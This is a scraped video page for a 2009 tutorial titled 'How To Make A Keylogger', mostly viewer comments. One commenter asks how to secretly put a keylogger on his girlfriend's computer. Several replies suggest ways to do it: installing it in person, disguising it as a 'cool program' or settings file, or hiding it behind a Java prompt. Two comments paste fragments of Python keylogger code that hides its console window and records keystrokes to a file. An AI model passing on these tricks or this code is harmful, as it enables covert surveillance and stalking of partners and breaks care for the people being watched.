Alert icon
We're changing our privacy policy. This stuff matters.  Learn more  Dismiss

How To Make A Keylogger

Loading...

Sign in or sign up now!
Alert icon
Upgrade to the latest Flash Player for improved playback performance. Upgrade now or more info.
347,801
Loading...
Alert icon
Sign in or sign up now!
Alert icon

Uploaded by on Sep 11, 2009

This video shows you the basics of making a Python Keylogger. You can find the sourcecode here:
http://www.tinkernut.com/forum/video-tutorial-help/how-to-make-a-keylogger

  • likes, 160 dislikes

Link to this comment:

Share to:

Top Comments

  • Can I make a keylogger and send it to someone?

    Without them knowing it?

    I need to know how because I dont trust my girlfriend.

  • it won't let me save it in local disc (C:)

see all

All Comments (1,672)

Sign In or Sign Up now to post a comment!
  • @TheTuranli00 dude if you don't trust your girlfriend don't send a keylogger to her, go talk to her.

    But anyways, you can do 2 things, go at her place and actually put the keylogger on her computer, or tell her that you found a cool program and send her this and after she does that tell her that this file is about the settings and then send an actually cool program.

  • it doesnt work!, it says it failed to load win32api!!

    please help

  • could you add links for them? the websites i go to are different then yours and i cant download some things from those sites

  • @TheTuranli00 Yes you can, like if they played a game or something if you could talk them into visiting it have it run with java, it might take more coding but, if you really want to know you'll do it. Code it where you say yes to java actually being a keylogger.

  • it says error: win32api it says ther is none...plz help

  • @TheTuranli00 then you should get the all spy! =P

  • @TheTuranli00 ...Because you don't trust your girlfriend? LMAO!(: I would do same thing haha.

  • help plz

    i cant find output.txt

  • @xxOceanFlowxx part 2 of code: f=open('c:output.txt','w') keylogs=chr(event.Ascii) if event.Ascii==13: keylogs='/n'  buffer += keylogs f.write(buffer) f.close() hm = pyHook.HookManager() hm.KeyDown = OnKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages()

  • @xxOceanFlowxx import win32gui import pythoncom, pyHook win = win32console.GetConsoleWindow(­) win32gui.ShowWindow(win,0) def OnKeyboardEvent(event): if event.Ascii==5: _exit(1) if event.Ascii != 0 or 8: f=open('c:output.txt','r') buffer=f.read() f.close()

Loading...

Alert icon
0 / 00Unsaved Playlist Return to active list
    1. Your queue is empty. Add videos to your queue using this button:
      or sign in to load a different list.
    Loading...Loading...Saving...
    • Clear all videos from this list
    • Learn more